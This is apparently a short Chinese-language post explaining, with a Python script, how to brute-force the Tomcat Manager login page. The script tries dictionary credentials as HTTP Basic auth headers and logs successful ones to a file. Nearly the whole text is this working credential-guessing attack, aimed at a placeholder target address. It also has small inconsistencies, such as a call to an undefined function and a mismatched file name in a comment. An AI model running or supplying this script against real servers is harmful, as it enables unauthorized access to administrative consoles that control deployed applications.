1.原理就是对tomcat毫无限制的密码访问依然有所响应,根据返回字符串进行判断识别
代码如下:
import requests
import base64
def bp(ip,port):
try:
print(ip)
bp1(ip,port)
url = 'http://'+ip+':'+port+'/manager/html'
with open("passwd.txt", "r") as f:
while 1:
# 取出字典中的用户名和密码
passwd = f.readline()[:-1]
# 如果为空,dick.txt文件的最后一行,退出运行
if passwd == "":
break
# 对用户名和密码进行base64加密
Authorization = "Basic " + base64.b64encode(passwd.encode("utf-8")).decode("utf-8")
headers = {
"Authorization": Authorization
}
response = requests.get(url, headers=headers)
#print(response.status_code)
# 根据返回的状态码,判断用户名和密码是否正确
if response.status_code == 200 and 'Tomcat' in response.text:
#print("success")
print(url+'|' + passwd)
save=open('r.txt','a+')
save.write(url+'-' + passwd+"\n")
save.close()
break
except:
pass
if __name__ == '__main__':
bp('xxxxxxx','8081')
2.成功后会有r.txt输出